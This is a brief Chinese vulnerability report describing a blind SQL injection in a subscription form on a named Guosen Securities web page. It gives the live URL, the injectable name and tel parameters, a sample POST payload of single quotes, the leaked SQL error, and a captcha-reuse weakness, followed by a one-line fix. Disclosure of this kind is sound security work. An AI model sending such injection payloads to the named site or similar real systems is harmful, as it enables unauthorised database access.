国信证券某站表单过滤不严,爆出sql语句,可盲注
漏洞地址:http://bj.guosen.com.cn/index.php?s=/Html/Subscribe/
注入参数:name,tel
表单
post数据例子:
posts=1&name=%27&tel=%27&verify=%27&__hash__=834853f5222e8037bde233d71f13f63d
查看返回数据,出现
sql:SELECT * FROM cms_class WHERE parentid=32
验证码错误一直爆出这个语句。
验证码正确填写,姓名电话填写单引号,报错:
into cms_book("name", "tel", "tiestamp") values( ''', ''', '2014-02-08 20:52:24' )
可见未过滤单引号。
另外,每次提交数据,验证码和__hash__没有销毁,可反复提交注入,不必每次填写验证码。
修补方案:过滤,除去报错
版权与免责声明:
凡注明稿件来源的内容均为转载稿或由网友用户注册发布,本网转载出于传递更多信息的目的;如转载稿涉及版权问题,请作者联系我们,同时对于用户评论等信息,本网并不意味着赞同其观点或证实其内容的真实性;